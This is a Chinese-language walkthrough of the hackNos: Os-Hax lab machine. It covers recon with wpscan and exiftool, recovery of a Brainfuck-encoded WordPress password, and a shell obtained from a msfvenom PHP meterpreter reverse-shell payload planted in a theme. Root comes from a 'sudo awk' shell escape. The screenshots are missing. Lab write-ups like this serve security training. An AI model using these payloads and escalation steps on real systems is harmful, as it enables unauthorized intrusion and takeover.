靶机渗透日记 hackNos: Os-Hax

文章目录

信息收集

  1. ip
    靶机渗透日记 hackNos: Os-Hax

  2. 端口
    靶机渗透日记 hackNos: Os-Hax

  3. 目录扫描
    靶机渗透日记 hackNos: Os-Hax

    发现存在 wordpress

  4. 使用 wpscan

    靶机渗透日记 hackNos: Os-Hax

    发现存在 web 用户

    靶机渗透日记 hackNos: Os-Hax

    靶机渗透日记 hackNos: Os-Hax

    没有发现插件

  5. 在 /img 目录下存在 flaghost.png
    靶机渗透日记 hackNos: Os-Hax

  6. 用exiftool查看了一下图片信息

    exiftool flaghost.png
    

    靶机渗透日记 hackNos: Os-Hax

  7. 可能是 web 用户的密码,尝试后发现是路径信息,访问 /passw@45 出现 flag2.txt , 内容如下

    靶机渗透日记 hackNos: Os-Hax

    搜索得知这是 Brainfuck 编码

    解密后得到 web:Hacker@4514

  8. 此时可以登录到 wordpress 后台,发现 web 用户是 Administrator 权限

Getshell

这里可以使用两种方法getshell

方法一

修改模板反弹shell

使用MSF生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.154.128 lport=4444 > shell.php

靶机渗透日记 hackNos: Os-Hax

方法二

命令执行

通过修改前端绕过长度限制

靶机渗透日记 hackNos: Os-Hax

提权

靶机渗透日记 hackNos: Os-Hax

尝试 web 账号密码登录

在家目录得到flag3

靶机渗透日记 hackNos: Os-Hax

发现可以以 root 用户执行 awk 命令

靶机渗透日记 hackNos: Os-Hax

执行命令

sudo awk 'BEGIN {system("/bin/sh")}'

靶机渗透日记 hackNos: Os-Hax

上一篇:linux shell文件截取前几行,后几行,中间几行命令


下一篇:Shell-笔记